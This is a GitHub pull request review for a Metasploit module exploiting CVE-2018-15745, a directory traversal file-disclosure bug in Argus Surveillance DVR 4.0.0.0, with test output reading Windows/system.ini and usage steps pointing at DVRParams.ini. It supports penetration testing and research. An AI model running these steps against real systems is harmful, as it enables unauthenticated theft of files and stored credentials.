Argus LFI Auxiliary Module with Associated Doc (CVE-2018-15745) #19847
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jheysel-r7
reviewed
Jan 30, 2025
There was a problem hiding this comment.
Thanks for the module @TheBigStonk. A couple minor comments with regard to the metadata but other than that it looks good.
Testing Windows 11
msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
[*] Running module against 172.16.199.131
[*] Sending request to 172.16.199.131:8080 for file: Windows/system.ini
[+] File retrieved successfully!
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[*] Auxiliary module execution completed
jheysel-r7
added
module
docs
rn-modules
|
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit: You can automate most of these changes with the Please update your branch after these have been made, and reach out if you have any problems. |
Oh cool, I'm new-ish to Ruby. Prefer this :) Co-authored-by: cgranleese-r7 <[email protected]>
Apologies for that this is my first module. Yeah want to make sure John Page is given appropriate kudos. Co-authored-by: jheysel-r7 <[email protected]>
Good spot Co-authored-by: jheysel-r7 <[email protected]>
TIL, thanks Co-authored-by: jheysel-r7 <[email protected]>
awesome cutting this one out then :) Co-authored-by: jheysel-r7 <[email protected]>
Adding in RPORT default option Co-authored-by: jheysel-r7 <[email protected]>
|
@cgranleese-r7 @jheysel-r7 thanks team. Should be everything fixed up from the comments |
jheysel-r7
reviewed
Jan 31, 2025
jheysel-r7
reviewed
Jan 31, 2025
jheysel-r7
approved these changes
Jan 31, 2025
There was a problem hiding this comment.
Final testing 👍
msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
[*] Running module against 172.16.199.131
[*] Sending request to 172.16.199.131:8080 for file: Windows/system.ini
[+] File retrieved successfully!
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[*] Auxiliary module execution completed
Release NotesAdds a module which exploits CVE-2018-15745, an unauthenticated directory traversal leading to file disclosure in Argus Surveillance DVR 4.0.0.0. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module leverages an issue with how the
RESULTPAGEparameter withinWEBACCCOUNT.cgihandles file referencing and as a result is vulnerable to Local File Inclusion (LFI).Options
To successfully read contents of the Windows file system you must set the full file path of the file you want to check using
TARGET_FILE(not including the drive letter prefix).As a first run it is recommended to try leaking
Windows/system.inias a validation exercise on your first module run.Testing
To setup a test environment, the following steps can be performed:
Verification Steps
use auxiliary/gather/argus_dvr4_lfi_cve_2018_15745set RHOSTS <TARGET_IP_ADDRESS>set TARGET_FILE Windows/system.inirunScenarios
Utilising Argus DVR 4 CVE-2018-15745 to Leak DVRParams.ini